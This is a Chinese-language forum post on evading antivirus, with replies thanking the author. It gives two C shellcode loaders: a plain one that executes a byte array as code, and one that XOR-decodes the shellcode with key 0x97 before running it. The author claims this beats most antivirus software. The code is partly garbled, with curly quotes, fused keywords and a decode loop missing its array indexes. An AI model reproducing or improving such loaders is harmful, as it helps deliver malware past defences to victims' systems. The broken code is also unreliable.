零基础入门学免杀（一）

免杀爱好者

零基础入门学免杀（一）

目前有很多利用shellcode自动免杀的工具，但是这些工具的指纹有相似的
如果有人传到网上扫描被杀或者工具过时怎么办？
这时你就需要自己制作免杀了
最简单的就是shellcode加密直接生成可执行文件

直接生成shellcode、
有时候shellcode是直接可以免杀的  但是有的时候是会被杀的



一：无加密直接自己生成可执行文件
分配一些内存，拷贝字符数组到分配的内存中，最后执行它


#include"stdafx.h"
/* length: 798 bytes*/
unsigned charshellcode[] = “\xfc\xe8\x89\x00\......”//这里写shellcode

int main(intargc, char* argv[])
{
       ((void(*)(void))&shellcode)();
       return 0;
}



直接生成有时候能过一部分杀毒



二：加密shellcode生成可执行文件

加密的方式有很多，可以加密一次也可以多次加密，我用异或加密演示给大家看

首先把自己的shellcode进行异或加密一次，然后把加密的代码解密执行。

我这里把shellcode和0x97异或加密过后解密执行

#include "stdafx.h"
#include <windows.h>
#define KEY 0x97     //进行异或的字符
/* length: 798 bytes */
unsigned char buf[] =
"\x6b\x7f\x1e\x97\x97\”   这里输入你自己加密过后的shellcode
int main(int argc, char* argv[])
{
  unsigned char c[sizeof(buf)];   //获取shellcode长度
  for (int i = 0; i < sizeof(buf)-1; i++)
  {
    c = buf ^ KEY;//进行解密
  }


  ( (void(*)(void))&c)(); 执行shellcode
  return 0;
}





这个方法目前可以过掉大部分杀毒

asdlxy

我看不错噢 谢谢楼主！

TkShow

楼主雷锋啊，谢谢分享

kkkkkkkkk

感谢分享，感觉很实用

star123

楼主，我太崇拜你了！

wfandch

pwndog

6